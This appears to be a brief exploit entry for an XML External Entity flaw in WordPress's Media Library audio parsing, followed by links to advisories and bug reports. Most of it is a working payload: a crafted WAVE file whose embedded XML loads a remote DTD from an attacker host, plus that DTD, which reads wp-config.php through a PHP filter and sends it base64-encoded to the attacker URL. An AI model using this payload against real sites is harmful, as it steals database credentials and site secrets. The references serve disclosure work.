A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. WordPress used an audio parsing library called ID3 that was affected by an XML External Entity (XXE) vulnerability affecting PHP versions 8 and above. This particular vulnerability could be triggered when parsing WAVE audio files.
payload.wav:
RIFFXXXXWAVEBBBBiXML<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>>
xxe.dtd:
<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">
blog.sonarsource.com/wordpress-xxe-security-vulnerability/
blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
core.trac.wordpress.org/changeset/29378
github.com/WordPress/wordpress-develop/security/advisories/GHSA-rv47-pc52-qrhh
hackerone.com/reports/1095645
wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/